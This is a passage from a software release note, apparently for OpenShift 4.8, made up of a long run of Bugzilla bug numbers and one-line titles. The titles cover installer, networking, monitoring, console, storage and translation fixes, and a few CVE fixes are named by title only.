[Multus] multi-networkpolicy does wrong filtering 1952545 - Selection issue when inserting YAML snippets 1952585 - Operator links for 'repository' and 'container image' should be clickable in OperatorHub 1952604 - Incorrect port in external loadbalancer config 1952610 - [aws] image-registry panics when the cluster is installed in a new region 1952611 - Tracking bug for OCPCLOUD-1115 - support user-defined tags on AWS EC2 Instances 1952618 - 4.7.4->4.7.8 Upgrade Caused OpenShift-Apiserver Outage 1952625 - Fix 
translator-reported text issues 1952632 - 4.8 installer should default ClusterVersion channel to stable-4.8 1952635 - Web console displays a blank page- white space instead of cluster information 1952665 - [Multus] multi-networkpolicy pod continue restart due to OOM (out of memory) 1952666 - Implement Enhancement 741 for Kubelet 1952667 - Update Readme for cluster-baremetal-operator with details about the operator 1952684 - cluster-etcd-operator: metrics controller panics on invalid response from client 1952728 - It was not clear for users why Snapshot feature was not available 1952730 - “Customize virtual machine” and the “Advanced” feature are confusing in wizard 1952732 - Users did not understand the boot source labels 1952741 - Monitoring DB: after set Time Range as Custom time range, no data display 1952744 - PrometheusDuplicateTimestamps with user workload monitoring enabled 1952759 - [RFE]It was not immediately clear what the Star icon meant 1952795 - cloud-network-config-controller CRD does not specify correct plural name 1952819 - failed to configure pod interface: error while waiting on flows for pod: timed out waiting for OVS flows 1952820 - [LSO] Delete localvolume pv is failed 1952832 - [IBM][ROKS] Enable the Web console UI to deploy OCS in External mode on IBM Cloud 1952891 - Upgrade failed due to cinder csi driver not deployed 1952904 - Linting issues in gather/clusterconfig package 1952906 - Unit tests for configobserver.go 1952931 - CI does not check leftover PVs 1952958 - Runtime error loading console in Safari 13 1953019 - [Installer][baremetal][metal3] The baremetal IPI installer fails on delete cluster with: failed to clean baremetal bootstrap storage pool 1953035 - Installer should error out if publish: Internal is set while deploying OCP cluster on any on-prem platform 1953041 - openshift-authentication-operator uses 3.9k% of its requested CPU 1953077 - Handling GCP's: Error 400: Permission accesscontextmanager.accessLevels.list is not valid for this resource 1953102 - kubelet CPU use during an e2e run increased 25% after rebase 1953105 - RHCOS system components registered a 3.5x increase in CPU use over an e2e run before and after 4/9 1953169 - endpoint slice controller doesn't handle services target port correctly 1953257 - Multiple EgressIPs per node for one namespace when "oc get hostsubnet" 1953280 - DaemonSet/node-resolver is not recreated by dns operator after deleting it 1953291 - cluster-etcd-operator: peer cert DNS SAN is populated incorrectly 1953418 - [e2e][automation] Fix vm wizard validate tests 1953518 - thanos-ruler pods failed to start up for "cannot unmarshal DNS message" 1953530 - Fix openshift/sdn unit test flake 1953539 - kube-storage-version-migrator: priorityClassName not set 1953543 - (release-4.8) Add missing sample archive data 1953551 - build failure: unexpected trampoline for shared or dynamic linking 1953555 - GlusterFS tests fail on ipv6 clusters 1953647 - prometheus-adapter should have a PodDisruptionBudget in HA topology 1953670 - ironic container image build failing because esp partition size is too small 1953680 - ipBlock ignoring all other cidr's apart from the last one specified 1953691 - Remove unused mock 1953703 - Inconsistent usage of Tech preview badge in OCS plugin of OCP Console 1953726 - Fix issues related to loading dynamic plugins 1953729 - e2e unidling test is flaking heavily on SNO jobs 1953795 - Ironic can't virtual media attach ISOs sourced from ingress routes 1953798 - GCP e2e (parallel and upgrade) regularly trigger 
KubeAPIErrorBudgetBurn alert, also happens on AWS 1953803 - [AWS] Installer should do pre-check to ensure user-provided private hosted zone name is valid for OCP cluster 1953810 - Allow use of storage policy in VMC environments 1953830 - The oc-compliance build does not available for OCP4.8 1953846 - SystemMemoryExceedsReservation alert should consider hugepage reservation 1953977 - [4.8] packageserver pods restart many times on the SNO cluster 1953979 - Ironic caching virtualmedia images results in disk space limitations 1954003 - Alerts shouldn't report any alerts in firing or pending state: openstack-cinder-csi-driver-controller-metrics TargetDown 1954025 - Disk errors while scaling up a node with multipathing enabled 1954087 - Unit tests for kube-scheduler-operator 1954095 - Apply user defined tags in AWS Internal Registry 1954105 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns 1954124 - oc set volume not adding storageclass to pvc which leads to issues using snapshots 1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js 1954177 - machine-api: admissionReviewVersions v1beta1 is going to be removed in 1.22 1954187 - multus: admissionReviewVersions v1beta1 is going to be removed in 1.22 1954248 - Disable Alertmanager Protractor e2e tests 1954317 - [assisted operator] Environment variables set in the subscription not being inherited by the assisted-service container 1954330 - NetworkPolicy: allow-from-router with label policy-group.network.openshift.io/ingress: "" does not work on a upgraded cluster 1954421 - Get 'Application is not available' when access Prometheus UI 1954459 - Error: Gateway Time-out display on Alerting console 1954460 - UI, The status of "Used Capacity Breakdown [Pods]" is "Not available" 1954509 - FC volume is marked as unmounted after failed reconstruction 1954540 - Lack translation for local language on pages under storage menu 1954544 - authn operator: endpoints controller should use the context it creates 1954554 - Add e2e tests for auto node sizing 1954566 - Cannot update a component (UtilizationCard) error when switching perspectives manually 1954597 - Default image for GCP does not support ignition V3 1954615 - Undiagnosed panic detected in pod: pods/openshift-cloud-credential-operator_cloud-credential-operator 1954634 - apirequestcounts does not honor max users 1954638 - apirequestcounts should indicate removedinrelease of empty instead of 2.0 1954640 - Support of gatherers with different periods 1954671 - disable volume expansion support in vsphere csi driver storage class 1954687 - localvolumediscovery and localvolumset e2es are disabled 1954688 - LSO has missing examples for localvolumesets 1954696 - [API-1009] apirequestcounts should indicate useragent 1954715 - Imagestream imports become very slow when doing many in parallel 1954755 - Multus configuration should allow for net-attach-defs referenced in the openshift-multus namespace 1954765 - CCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1954768 - baremetal-operator: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1954770 - Backport upstream fix for Kubelet getting stuck in DiskPressure 1954773 - OVN: check (see bug 1947801#c4 
steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert 1954783 - [aws] support byo private hosted zone 1954790 - KCM Alert PodDisruptionBudget At and Limit do not alert with maxUnavailable or MinAvailable by percentage 1954830 - verify-client-go job is failing for release-4.7 branch 1954865 - Add necessary priority class to pod-identity-webhook deployment 1954866 - Add necessary priority class to downloads 1954870 - Add necessary priority class to network components 1954873 - dns server may not be specified for clusters with more than 2 dns servers specified by openstack. 1954891 - Add necessary priority class to pruner 1954892 - Add necessary priority class to ingress-canary 1954931 - (release-4.8) Remove legacy URL anonymization in the ClusterOperator related resources 1954937 - [API-1009] oc get apirequestcount shows blank for column REQUESTSINCURRENTHOUR 1954959 - unwanted decorator shown for revisions in topology though should only be shown only for knative services 1954972 - TechPreviewNoUpgrade featureset can be undone 1954973 - "read /proc/pressure/cpu: operation not supported" in node-exporter logs 1954994 - should update to 2.26.0 for prometheus resources label 1955051 - metrics "kube_node_status_capacity_cpu_cores" does not exist 1955089 - Support [sig-cli] oc observe works as expected test for IPv6 1955100 - Samples: APIRemovedInNextReleaseInUse info alerts display 1955102 - Add vsphere_node_hw_version_total metric to the collected metrics 1955114 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM 1955196 - linuxptp-daemon crash on 4.8 1955226 - operator updates apirequestcount CRD over and over 1955229 - release-openshift-origin-installer-e2e-aws-calico-4.7 is permfailing 1955256 - stop collecting API that no longer exists 1955324 - Kubernetes Autoscaler should use Go 1.16 for testing scripts 1955336 - Failure to Install OpenShift on GCP due to Cluster Name being similar to / contains "google" 1955414 - 4.8 -> 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator 1955445 - Drop crio image metrics with high cardinality 1955457 - Drop container_memory_failures_total metric because of high cardinality 1955467 - Disable collection of node_mountstats_nfs metrics in node_exporter 1955474 - [aws-ebs-csi-driver] rebase from version v1.0.0 1955478 - Drop high-cardinality metrics from kube-state-metrics which aren't used 1955517 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation 1955548 - [IPI][OSP] OCP 4.6/4.7 IPI with kuryr exceeds defined serviceNetwork range 1955554 - MAO does not react to events triggered from Validating Webhook Configurations 1955589 - thanos-querier should have a PodDisruptionBudget in HA topology 1955595 - Add DevPreviewLongLifecycle Descheduler profile 1955596 - Pods stuck in creation phase on realtime kernel SNO 1955610 - release-openshift-origin-installer-old-rhcos-e2e-aws-4.7 is permfailing 1955622 - 4.8-e2e-metal-assisted jobs: Timeout of 360 seconds expired waiting for Cluster to be in status ['installing', 'error'] 1955701 - [4.8] RHCOS boot image bump for RHEL 8.4 Beta 1955749 - OCP branded templates need to be translated 1955761 - packageserver clusteroperator does not set reason or message for Available condition 1955783 - NetworkPolicy: ACL audit log message for allow-from-router policy should also include the namespace to distinguish between two policies similarly 
named configured in respective namespaces 1955803 - OperatorHub - console accepts any value for "Infrastructure features" annotation 1955822 - CIS Benchmark 5.4.1 Fails on ROKS 4: Prefer using secrets as files over secrets as environment variables 1955854 - Ingress clusteroperator reports Degraded=True/Available=False if any ingresscontroller is degraded or unavailable 1955862 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1955874 - Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct 1955879 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-> Removed-> Managed in configs.imageregistry with high ratio 1955969 - Workers cannot be deployed attached to multiple networks. 1956079 - Installer gather doesn't collect any networking information 1956208 - Installer should validate root volume type 1956220 - Set htt proxy system properties as expected by kubernetes-client 1956281 - Disconnected installs are failing with kubelet trying to pause image from the internet 1956334 - Event Listener Details page does not show Triggers section 1956353 - test: analyze job consistently fails 1956372 - openshift-gcp-routes causes disruption during upgrade by stopping before all pods terminate 1956405 - Bump k8s dependencies in cluster resource override admission operator 1956411 - Apply custom tags to AWS EBS volumes 1956480 - [4.8] Bootimage bump tracker 1956606 - probes FlowSchema manifest not included in any cluster profile 1956607 - Multiple manifests lack cluster profile annotations 1956609 - [cluster-machine-approver] CSRs for replacement control plane nodes not approved after restore from backup 1956610 - manage-helm-repos manifest lacks cluster profile annotations 1956611 - OLM CRD schema validation failing against CRs where the value of a string field is a blank string 1956650 - The container disk URL is empty for Windows guest tools 1956768 - aws-ebs-csi-driver-controller-metrics TargetDown 1956826 - buildArgs does not work when the value is taken from a secret 1956895 - Fix chatty kubelet log message 1956898 - fix log files being overwritten on container state loss 1956920 - can't open terminal for pods that have more than one container running 1956959 - ipv6 disconnected sno crd deployment hive reports success status and clusterdeployrmet reporting false 1956978 - Installer gather doesn't include pod names in filename 1957039 - Physical VIP for pod -> Svc -> Host is incorrectly set to an IP of 169.254.169.2 for Local GW 1957041 - Update CI e2echart with more node info 1957127 - Delegated authentication: reduce the number of watch requests 1957131 - Conformance tests for OpenStack require the Cinder client that is not included in the "tests" image 1957146 - Only run test/extended/router/idle tests on OpenshiftSDN or OVNKubernetes 1957149 - CI: "Managed cluster should start all core operators" fails with: OpenStackCinderDriverStaticResourcesControllerDegraded: "volumesnapshotclass.yaml" (string): missing dynamicClient 1957179 - Incorrect VERSION in node_exporter 1957190 - CI jobs failing due too many watch requests (prometheus-operator) 1957198 - Misspelled console-operator condition 1957227 - Issue replacing the EnvVariables using the unsupported ConfigMap 1957260 - [4.8] [gcp] Installer is missing new region/zone europe-central2 1957261 - update godoc for new build status image change trigger fields 1957295 - Apply priority classes conventions as 
test to openshift/origin repo 1957315 - kuryr-controller doesn't indicate being out of quota 1957349 - [Azure] Machine object showing Failed phase even node is ready and VM is running properly 1957374 - mcddrainerr doesn't list specific pod 1957386 - Config serve and validate command should be under alpha 1957446 - prepare CCO for future without v1beta1 CustomResourceDefinitions 1957502 - Infrequent panic in kube-apiserver in aws-serial job 1957561 - lack of pseudolocalization for some text on Cluster Setting page 1957584 - Routes are not getting created when using hostname without FQDN standard 1957597 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1957645 - Event "Updated PrometheusRule.monitoring.coreos.com/v1 because it changed" is frequently looped with weird empty {} changes 1957708 - e2e-metal-ipi and related jobs fail to bootstrap due to multiple VIP's 1957726 - Pod stuck in ContainerCreating - Failed to start transient scope unit: Connection timed out 1957748 - Ptp operator pod should have CPU and memory requests set but not limits 1957756 - Device Replacemet UI, The status of the disk is "replacement ready" before I clicked on "start replacement" 1957772 - ptp daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent 1957775 - CVO creating cloud-controller-manager too early causing upgrade failures 1957809 - [OSP] Install with invalid platform.openstack.machinesSubnet results in runtime error 1957822 - Update apiserver tlsSecurityProfile description to include Custom profile 1957832 - CMO end-to-end tests work only on AWS 1957856 - 'resource name may not be empty' is shown in CI testing 1957869 - baremetal IPI power_interface for irmc is inconsistent 1957879 - cloud-controller-manage ClusterOperator manifest does not declare relatedObjects 1957889 - Incomprehensible documentation of the GatherClusterOperatorPodsAndEvents gatherer 1957893 - ClusterDeployment / Agent conditions show "ClusterAlreadyInstalling" during each spoke install 1957895 - Cypress helper projectDropdown.shouldContain is not an assertion 1957908 - Many e2e failed requests caused by kube-storage-version-migrator-operator's version reads 1957926 - "Add Capacity" should allow to add n3 (or n4) local devices at once 1957951 - [aws] destroy can get blocked on instances stuck in shutting-down state 1957967 - Possible test flake in listPage Cypress view 1957972 - Leftover templates from mdns 1957976 - Ironic execute_deploy_steps command to ramdisk times out, resulting in a failed deployment in 4.7 1957982 - Deployment Actions clickable for view-only projects 1957991 - ClusterOperatorDegraded can fire during installation 1958015 - "config-reloader-cpu" and "config-reloader-memory" flags have been deprecated for prometheus-operator 1958080 - Missing i18n for login, error and selectprovider pages 1958094 - Audit log files are corrupted sometimes 1958097 - don't show "old, insecure token format" if the token does not actually exist 1958114 - Ignore staged vendor files in pre-commit script 1958126 - [OVN]Egressip doesn't take effect 1958158 - OAuth proxy container for AlertManager and Thanos are flooding the logs 1958216 - ocp libvirt: dnsmasq options in install config should allow duplicate option names 1958245 - cluster-etcd-operator: static pod revision is not visible from etcd logs 1958285 - Deployment considered unhealthy despite being available and at latest generation 1958296 - OLM must explicitly alert 
on deprecated APIs in use 1958329 - pick 97428: add more context to log after a request times out 1958367 - Build metrics do not aggregate totals by build strategy 1958391 - Update MCO KubeletConfig to mixin the API Server TLS Security Profile Singleton 1958405 - etcd: current health checks and reporting are not adequate to ensure availability 1958406 - Twistlock flags mode of /var/run/crio/crio.sock 1958420 - openshift-install 4.7.10 fails with segmentation error 1958424 - aws: support more auth options in manual mode 1958439 - Install/Upgrade button on Install/Upgrade Helm Chart page does not work with Form View 1958492 - CCO: pod-identity-webhook still accesses APIRemovedInNextReleaseInUse 1958643 - All pods creation stuck due to SR-IOV webhook timeout 1958679 - Compression on pool can't be disabled via UI 1958753 - VMI nic tab is not loadable 1958759 - Pulling Insights report is missing retry logic 1958811 - VM creation fails on API version mismatch 1958812 - Cluster upgrade halts as machine-config-daemon fails to parse rpm-ostree status during cluster upgrades 1958861 - [CCO] pod-identity-webhook certificate request failed 1958868 - ssh copy is missing when vm is running 1958884 - Confusing error message when volume AZ not found 1958913 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff 1958930 - network config in machine configs prevents addition of new nodes with static networking via kargs 1958958 - [SCALE] segfault with ovnkube adding to address set 1958972 - [SCALE] deadlock in ovn-kube when scaling up to 300 nodes 1959041 - LSO Cluster UI,"Troubleshoot" link does not exist after scale down osd pod 1959058 - ovn-kubernetes has lock contention on the LSP cache 1959158 - packageserver clusteroperator Available condition set to false on any Deployment spec change 1959177 - Descheduler dev manifests are missing permissions 1959190 - Set LABEL io.openshift.release.operator=true for driver-toolkit image addition to payload 1959194 - Ingress controller should use minReadySeconds because otherwise it is disrupted during deployment updates 1959278 - Should remove prometheus servicemonitor from openshift-user-workload-monitoring 1959294 - openshift-operator-lifecycle-manager:olm-operator-serviceaccount should not rely on external networking for health check 1959327 - Degraded nodes on upgrade - Cleaning bootversions: Read-only file system 1959406 - Difficult to debug performance on ovn-k without pprof enabled 1959471 - Kube sysctl conformance tests are disabled, meaning we can't submit conformance results 1959479 - machines doesn't support dual-stack loadbalancers on Azure 1959513 - Cluster-kube-apiserver does not use library-go for audit pkg 1959519 - Operand details page only renders one status donut no matter how many 'podStatuses' descriptors are used 1959550 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console 1959564 - Test verify /run filesystem contents failing 1959648 - oc adm top --help indicates that oc adm top can display storage usage while it cannot 1959650 - Gather SDI-related MachineConfigs 1959658 - showing a lot "constructing many client instances from the same exec auth config" 1959696 - Deprecate 'ConsoleConfigRoute' struct in console-operator config 1959699 - [RFE] Collect LSO pod log and daemonset log managed by LSO 1959703 - Bootstrap gather gets into an infinite loop on bootstrap-in-place mode 1959711 - Egressnetworkpolicy doesn't work when configure the EgressIP 
1959786 - [dualstack]EgressIP doesn't work on dualstack cluster for IPv6 1959916 - Console not works well against a proxy in front of openshift clusters 1959920 - UEFISecureBoot set not on the right master node 1959981 - [OCPonRHV] - Affinity Group should not create by default if we define empty affinityGroupsNames: [] 1960035 - iptables is missing from ose-keepalived-ipfailover image 1960059 - Remove "Grafana UI" link from Console Monitoring > Dashboards page 1960089 - ImageStreams list page, detail page and breadcrumb are not following CamelCase conventions 1960129 - [e2e][automation] add smoke tests about VM pages and actions 1960134 - some origin images are not public 1960171 - Enable SNO checks for image-registry 1960176 - CCO should recreate a user for the component when it was removed from the cloud providers 1960205 - The kubelet log flooded with reconcileState message once CPU manager enabled 1960255 - fixed obfuscation permissions 1960257 - breaking changes in pr template 1960284 - ExternalTrafficPolicy Local does not preserve connections correctly on shutdown, policy Cluster has significant performance cost 1960323 - Address issues raised by coverity security scan 1960324 - manifests: extra "spec.version" in console quickstarts makes CVO hotloop 1960330 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960334 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960337 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960339 - manifests: unset "preemptionPolicy" makes CVO hotloop 1960531 - Items under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod' keep added for every access 1960534 - Some graphs of console dashboards have no legend and tooltips are difficult to undstand compared with grafana 1960546 - Add virt_platform metric to the collected metrics 1960554 - Remove rbacv1beta1 handling code 1960612 - Node disk info in overview/details does not account for second drive where /var is located 1960619 - Image registry integration tests use old-style OAuth tokens 1960683 - GlobalConfigPage is constantly requesting resources 1960711 - Enabling IPsec runtime causing incorrect MTU on Pod interfaces 1960716 - Missing details for debugging 1960732 - Outdated manifests directory in CSI driver operator repositories 1960757 - [OVN] hostnetwork pod can access MCS port 22623 or 22624 on master 1960758 - oc debug / oc adm must-gather do not require openshift/tools and openshift/must-gather to be "the newest" 1960767 - /metrics endpoint of the Grafana UI is accessible without authentication 1960780 - CI: failed to create PDB "service-test" the server could not find the requested resource 1961064 - Documentation link to network policies is outdated 1961067 - Improve log gathering logic 1961081 - policy/v1beta1 PodDisruptionBudget is deprecated in v1.21+, unavailable in v1.25+; use policy/v1 PodDisruptionBudget in CMO logs 1961091 - Gather MachineHealthCheck definitions 1961120 - CSI driver operators fail when upgrading a cluster 1961173 - recreate existing static pod manifests instead of updating 1961201 - [sig-network-edge] DNS should answer A and AAAA queries for a dual-stack service is constantly failing 1961314 - Race condition in operator-registry pull retry unit tests 1961320 - CatalogSource does not emit any metrics to indicate if it's ready or not 1961336 - Devfile sample for BuildConfig is not defined 1961356 - Update single quotes to double quotes in string 1961363 - Minor string update for " No Storage classes found 
in cluster, adding source is disabled." 1961393 - DetailsPage does not work with group~version~kind 1961452 - Remove "Alertmanager UI" link from Console Monitoring > Alerting page 1961466 - Some dropdown placeholder text on route creation page is not translated 1961472 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true 1961506 - NodePorts do not work on RHEL 7.9 workers (was "4.7 -> 4.8 upgrade is stuck at Ingress operator Degraded with rhel 7.9 workers") 1961536 - clusterdeployment without pull secret is crashing assisted service pod 1961538 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop 1961545 - Fixing Documentation Generation 1961550 - HAproxy pod logs showing error "another server named 'pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080' was already defined at line 326, please use distinct names" 1961554 - respect the shutdown-delay-duration from OpenShiftAPIServerConfig 1961561 - The encryption controllers send lots of request to an API server 1961582 - Build failure on s390x 1961644 - NodeAuthenticator tests are failing in IPv6 1961656 - driver-toolkit missing some release metadata 1961675 - Kebab menu of taskrun contains Edit options which should not be present 1961701 - Enhance gathering of events 1961717 - Update runtime dependencies to Wallaby builds for bugfixes 1961829 - Quick starts prereqs not shown when description is long 1961852 - Excessive lock contention when adding many pods selected by the same NetworkPolicy 1961878 - Add Sprint 199 translations 1961897 - Remove history listener before console UI is unmounted 1961925 - New ManagementCPUsOverride admission plugin blocks pod creation in clusters with no nodes 1962062 - Monitoring dashboards should support default values of "All" 1962074 - SNO:the pod get stuck in CreateContainerError and prompt "failed to add conmon to systemd sandbox cgroup: dial unix /run/systemd/private: connect: resource temporarily unavailable" after adding a performanceprofile 1962095 - Replace gather-job image without FQDN 1962153 - VolumeSnapshot routes are ambiguous, too generic 1962172 - Single node CI e2e tests kubelet metrics endpoints intermittent downtime 1962219 - NTO relies on unreliable leader-for-life implementation. 1962256 - use RHEL8 as the vm-example 1962261 - Monitoring components requesting more memory than they use 1962274 - OCP on RHV installer fails to generate an install-config with only 2 hosts in RHV cluster 1962347 - Cluster does not exist logs after successful installation 1962392 - After upgrade from 4.5.16 to 4.6.17, customer's application is seeing re-transmits 1962415 - duplicate zone information for in-tree PV after enabling migration 1962429 - Cannot create windows vm because kubemacpool.io denied the request 1962525 - [Migration] SDN migration stuck on MCO on RHV cluster 1962569 - NetworkPolicy details page should also show Egress rules 1962592 - Worker nodes restarting during OS installation 1962602 - Cloud credential operator scrolls info "unable to provide upcoming..." 
on unsupported platform 1962630 - NTO: Ship the current upstream TuneD 1962687 - openshift-kube-storage-version-migrator pod failed due to Error: container has runAsNonRoot and image will run as root 1962698 - Console-operator can not create resource console-public configmap in the openshift-config-managed namespace 1962718 - CVE-2021-29622 prometheus: open redirect under the /new endpoint 1962740 - Add documentation to Egress Router 1962850 - [4.8] Bootimage bump tracker 1962882 - Version pod does not set priorityClassName 1962905 - Ramdisk ISO source defaulting to "http" breaks deployment on a good amount of BMCs 1963068 - ironic container should not specify the entrypoint 1963079 - KCM/KS: ability to enforce localhost communication with the API server. 1963154 - Current BMAC reconcile flow skips Ironic's deprovision step 1963159 - Add Sprint 200 translations 1963204 - Update to 8.4 IPA images 1963205 - Installer is using old redirector 1963208 - Translation typos/inconsistencies for Sprint 200 files 1963209 - Some strings in public.json have errors 1963211 - Fix grammar issue in kubevirt-plugin.json string 1963213 - Memsource download script running into API error 1963219 - ImageStreamTags not internationalized 1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment 1963267 - Warning: Invalid DOM property classname. Did you mean className? console warnings in volumes table 1963502 - create template from is not descriptive 1963676 - in vm wizard when selecting an os template it looks like selecting the flavor too 1963833 - Cluster monitoring operator crashlooping on single node clusters due to segfault 1963848 - Use OS-shipped stalld vs. the NTO-shipped one. 1963866 - NTO: use the latest k8s 1.21.1 and openshift vendor dependencies 1963871 - cluster-etcd-operator:[build] upgrade to go 1.16 1963896 - The VM disks table does not show easy links to PVCs 1963912 - "[sig-network] DNS should provide DNS for {services, cluster, subdomain, hostname}" failures on vsphere 1963932 - Installation failures in bootstrap in OpenStack release jobs 1963964 - Characters are not escaped on config ini file causing Kuryr bootstrap to fail 1964059 - rebase openshift/sdn to kube 1.21.1 1964197 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration 1964203 - e2e-metal-ipi, e2e-metal-ipi-ovn-dualstack and e2e-metal-ipi-ovn-ipv6 are failing due to "Unknown provider baremetal" 1964243 - The oc compliance fetch-raw doesn’t work for disconnected cluster 1964270 - Failed to install 'cluster-kube-descheduler-operator' with error: "clusterkubedescheduleroperator.4.8.0-202105211057.p0.assembly.stream\": must be no more than 63 characters" 1964319 - Network policy "deny all" interpreted as "allow all" in description page 1964334 - alertmanager/prometheus/thanos-querier /metrics endpoints are not secured 1964472 - Make project and namespace requirements more visible rather than giving me an error after submission 1964486 - Bulk adding of CIDR IPS to whitelist is not working 1964492 - Pick 102171: Implement support for watch initialization in P&F 1964625 - NETID duplicate check is only required in NetworkPolicy Mode 1964748 - Sync upstream 1.7.2 downstream 1964756 - PVC status is always in 'Bound' status when it is actually cloning 1964847 - Sanity check test suite missing from the repo 1964888 - opoenshift-apiserver imagestreamimports depend on >34s timeout support, WAS: transport: loopyWriter.run returning. 
connection error: desc = "transport is closing" 1964936 - error log for "oc adm catalog mirror" is not correct 1964979 - Add mapping from ACI to infraenv to handle creation order issues 1964997 - Helm Library charts are showing and can be installed from Catalog 1965024 - [DR] backup and restore should perform consistency checks on etcd snapshots 1965092 - [Assisted-4.7] [Staging][OLM] Operators deployments start before all workers finished installation 1965283 - 4.7->4.8 upgrades: cluster operators are not ready: openshift-controller-manager (Upgradeable=Unknown NoData: ), service-ca (Upgradeable=Unknown NoData: 1965330 - oc image extract fails due to security capabilities on files 1965334 - opm index add fails during image extraction 1965367 - Typo in in etcd-metric-serving-ca resource name 1965370 - "Route" is not translated in Korean or Chinese 1965391 - When storage class is already present wizard do not jumps to "Stoarge and nodes" 1965422 - runc is missing Provides oci-runtime in rpm spec 1965522 - [v2v] Multiple typos on VM Import screen 1965545 - Pod stuck in ContainerCreating: Unit ...slice already exists 1965909 - Replace "Enable Taint Nodes" by "Mark nodes as dedicated" 1965921 - [oVirt] High performance VMs shouldn't be created with Existing policy 1965929 - kube-apiserver should use cert auth when reaching out to the oauth-apiserver with a TokenReview request 1966077 - hidden descriptor is visible in the Operator instance details page1966116 - DNS SRV request which worked in 4.7.9 stopped working in 4.7.11 1966126 - root_ca_cert_publisher_sync_duration_seconds metric can have an excessive cardinality 1966138 - (release-4.8) Update K8s & OpenShift API versions 1966156 - Issue with Internal Registry CA on the service pod 1966174 - No storage class is installed, OCS and CNV installations fail 1966268 - Workaround for Network Manager not supporting nmconnections priority 1966401 - Revamp Ceph Table in Install Wizard flow 1966410 - kube-controller-manager should not trigger APIRemovedInNextReleaseInUse alert 1966416 - (release-4.8) Do not exceed the data size limit 1966459 - 'policy/v1beta1 PodDisruptionBudget' and 'batch/v1beta1 CronJob' appear in image-registry-operator log 1966487 - IP address in Pods list table are showing node IP other than pod IP 1966520 - Add button from ocs add capacity should not be enabled if there are no PV's 1966523 - (release-4.8) Gather MachineAutoScaler definitions 1966546 - [master] KubeAPI - keep day1 after cluster is successfully installed 1966561 - Workload partitioning annotation workaround needed for CSV annotation propagation bug 1966602 - don't require manually setting IPv6DualStack feature gate in 4.8 1966620 - The bundle.Dockerfile in the repo is obsolete 1966632 - [4.8.0] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install 1966654 - Alertmanager PDB is not created, but Prometheus UWM is 1966672 - Add Sprint 201 translations 1966675 - Admin console string updates 1966677 - Change comma to semicolon 1966683 - Translation bugs from Sprint 201 files 1966684 - Verify "Creating snapshot for claim <1>{pvcName}</1>" displays correctly 1966697 - Garbage collector logs every interval - move to debug level 1966717 - include full timestamps in the logs 1966759 - Enable downstream plugin for Operator SDK 1966795 - [tests] Release 4.7 broken due to the usage of wrong OCS version 1966813 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff 1966862 - 
vsphere IPI - local dns prepender is not prepending nameserver 127.0.0.1 1966892 - [master] [Assisted-4.8][SNO] SNO node cannot transition into "Writing image to disk" from "Waiting for bootkub[e" 1966952 - [4.8.0] [Assisted-4.8][SNO][Dual Stack] DHCPv6 settings "ipv6.dhcp-duid=ll" missing from dual stack install 1967104 - [4.8.0] InfraEnv ctrl: log the amount of NMstate Configs baked into the image 1967126 - [4.8.0] [DOC] KubeAPI docs should clarify that the InfraEnv Spec pullSecretRef is currently ignored 1967197 - 404 errors loading some i18n namespaces 1967207 - Getting started card: console customization resources link shows other resources 1967208 - Getting started card should use semver library for parsing the version instead of string manipulation 1967234 - Console is continuously polling for ConsoleLink acm-link 1967275 - Awkward wrapping in getting started dashboard card 1967276 - Help menu tooltip overlays dropdown 1967398 - authentication operator still uses previous deleted pod ip rather than the new created pod ip to do health check 1967403 - (release-4.8) Increase workloads fingerprint gatherer pods limit 1967423 - [master] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion 1967444 - openshift-local-storage pods found with invalid priority class, should be openshift-user-critical or begin with system- while running e2e tests 1967531 - the ccoctl tool should extend MaxItems when listRoles, the default value 100 is a little small 1967578 - [4.8.0] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion 1967591 - The ManagementCPUsOverride admission plugin should not mutate containers with the limit 1967595 - Fixes the remaining lint issues 1967614 - prometheus-k8s pods can't be scheduled due to volume node affinity conflict 1967623 - [OCPonRHV] - ./openshift-install installation with install-config doesn't work if ovirt-config.yaml doesn't exist and user should fill the FQDN URL 1967625 - Add OpenShift Dockerfile for cloud-provider-aws 1967631 - [4.8.0] Cluster install failed due to timeout while "Waiting for control plane" 1967633 - [4.8.0] [Assisted-4.8][SNO] SNO node cannot transition into "Writing image to disk" from "Waiting for bootkube" 1967639 - Console whitescreens if user preferences fail to load 1967662 - machine-api-operator should not use deprecated "platform" field in infrastructures.config.openshift.io 1967667 - Add Sprint 202 Round 1 translations 1967713 - Insights widget shows invalid link to the OCM 1967717 - Insights Advisor widget is missing a description paragraph and contains deprecated naming 1967745 - When setting DNS node placement by toleration to not tolerate master node, effect value should not allow string other than "NoExecute" 1967803 